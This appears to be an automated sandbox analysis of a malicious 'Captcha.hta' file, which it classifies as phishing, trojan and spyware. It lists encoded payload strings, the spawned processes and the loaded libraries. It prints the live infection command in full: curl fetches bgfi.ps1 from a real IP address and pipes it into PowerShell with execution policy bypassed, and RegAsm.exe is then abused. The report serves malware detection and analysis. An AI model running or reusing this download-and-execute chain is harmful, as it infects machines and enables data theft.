WkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
                      Source: 4.2.powershell.exe.4d8ab64.2.raw.unpack, Pls.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
                      Source: 4.2.powershell.exe.4a3acb0.0.raw.unpack, Sap.csBase64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
                      Source: 4.2.powershell.exe.4a3acb0.0.raw.unpack, Pls.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
                      Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winHTA@14/10@1/2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,7_2_004361E0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1660:304:WilStaging_02
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1660:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmp4lrp5.lef.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Captcha.htaReversingLabs: Detection: 13%
                      Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Captcha.hta"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA2B.tmp" "c:\Users\user\AppData\Local\Temp\cqvy0dal\CSC988509BDD3DA4C1893528181DB7478.TMP"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA2B.tmp" "c:\Users\user\AppData\Local\Temp\cqvy0dal\CSC988509BDD3DA4C1893528181DB7478.TMP"Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edgegdi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\curl.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: edgegdi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
